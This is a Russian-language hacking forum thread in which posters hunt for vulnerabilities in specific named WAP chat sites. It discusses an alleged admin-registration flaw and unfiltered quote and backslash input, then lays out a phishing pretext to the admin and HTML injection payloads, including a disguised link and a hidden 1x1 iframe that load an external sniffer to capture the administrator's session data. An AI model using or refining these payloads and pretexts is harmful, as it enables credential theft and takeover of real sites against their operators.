Всем привет,сейчас по вапу распространяются новые чаты чем то похожие на бодр чат,только со множеством новинок! вот этот чат http://chat.asylex.com Кто какие знает уязвимости этого чата,пишите сюда! Все уязвимости от бодра чата,описанные в этом форуме на Асилекс чате не пашут! на http://chat.asylex.com дырочек думаю не будет,так как это автор скрипта,а вот тут http://anarim.gsm.az вполне могут быть!
Советую посмотреть регистрацию! там дыра! большая! регистрируешься администратором! мне друган показывал но к сожелению я не запомнил стимволы которые он вводил!может скоро узнаю!
На anarim.gsm.az фильтруются переменные id,ps,nk,us,mod,ref,символы ',%27,* в гет и пост запросах не фильтруется обратный слэш,в отправке почты и поиске можно выйти за кавычку,кому интересно мож покалупает
К сожалению не смог зайти на http://chat.asylex.com Но могу сказать с уверенностью! В большинстве W@P-сайтов Переменные [id=&pass=&] передаються методом GET Так чтоб не париться Можно взять Ачатовский сниффер, Зарегиться в чате под ником МАША и написать Товарищу Админу HeLP-Письмецо : Со следующим содержанием;; Мне сказали что только вы мне сможете помочь! У меня никак не получаеться вставить свою фотку в анкету посмотрите что можно сделать!!! Адрес фото: http://antichat.ru/sniffer.gif Думаю шанс наивного админа ткнуть на ссылку(если он не посещал А-чат) примерно 80/20!!! Далее, смотрим логи снифера! И Да здравствует МИР во всём мире!
гы)) Чоб админ на такую сцылочку повелся, надо чтобы он был не просто наивным, а супер-супер ньюб. Надо, по крайней мере писать свой простой пхп снифер, и назвать его как то менее вызывающе.
Да ты прав ! Ссылка вызывает подозрения! Но в некоторых чатах Имееться возможность отправки личных сообщений! Дак вот что я заметил, товарищи Админы не уделяют внимания на то что в писльмо можно вставить свой html-код! Отсюда следует что достаточно написать такое сообщение чтобы все сомнения отвалились сами по себе! <a href="http://antichat.ru/sniffer.gif">http://mashka.boom.ru/moe_foto.jpg</a> А ещё лучше и надёжнее такая конструкция: <!---В этом случае Админу нужно просто получить письмо и открыть его---!> <iframe style="width=1;height=1" src="http://antichat.ru/sniffffer.gif"></iframe>
